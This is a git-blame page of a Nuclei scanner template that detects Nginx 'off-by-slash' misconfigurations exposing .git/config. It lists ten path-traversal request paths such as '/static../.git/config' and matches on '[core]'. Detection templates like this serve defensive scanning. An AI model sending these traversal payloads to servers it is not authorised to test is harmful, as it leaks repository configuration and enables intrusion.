daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/exposures/configs/git-config-nginxoffbyslash....

42 lines
1.3 KiB
YAML
Raw Normal View History

updates
2020-07-02 13:53:41 +00:00
id: git-config-nginxoffbyslash
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
updates
2020-07-02 13:53:41 +00:00
info:
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements
2022-07-27 20:17:31 +00:00
name: Nginx - Git Configuration Exposure
updates
2020-07-02 13:53:41 +00:00
author: organiccrap
severity: medium
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements
2022-07-27 20:17:31 +00:00
description: Nginx is vulnerable to git configuration exposure.
Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-18 11:37:49 +00:00
reference:
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements
2022-07-27 20:17:31 +00:00
- https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
Refrence also includes explaination and a solution
2021-05-10 06:47:28 +00:00
- https://twitter.com/Random_Robbie/status/1262676628167110656
- https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements
2022-07-27 20:17:31 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 10
templateman update
2023-10-14 11:27:55 +00:00
tags: config,exposure,nginx
severity updates
2020-09-20 12:57:43 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
updates
2020-07-02 13:53:41 +00:00
- method: GET
path:
feat: convert paths with lots of elements to payloads
2024-04-12 10:31:51 +00:00
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- '/static../.git/config'
- '/js../.git/config'
- '/images../.git/config'
- '/img../.git/config'
- '/css../.git/config'
- '/assets../.git/config'
- '/content../.git/config'
- '/events../.git/config'
- '/media../.git/config'
- '/lib../.git/config'
Added stop-at-first-match in applicable templates
2021-09-02 11:59:10 +00:00
stop-at-first-match: true
updates
2020-07-02 13:53:41 +00:00
matchers:
- type: word
words:
- '[core]'
Auto Template Signing [Fri Apr 12 10:58:46 UTC 2024] :robot:
2024-04-12 10:58:47 +00:00
# digest: 490a004630440220428f7cb6e63a587930ea6412a94e5d322bbcbf4fc3a7f451c42dca4e455b0b88022067e5bcc7186dcdb733480c25d911a719caa8535f0232ad7c57a00b82c0fb81b6:922c64590222798bb761d5b6d8e72950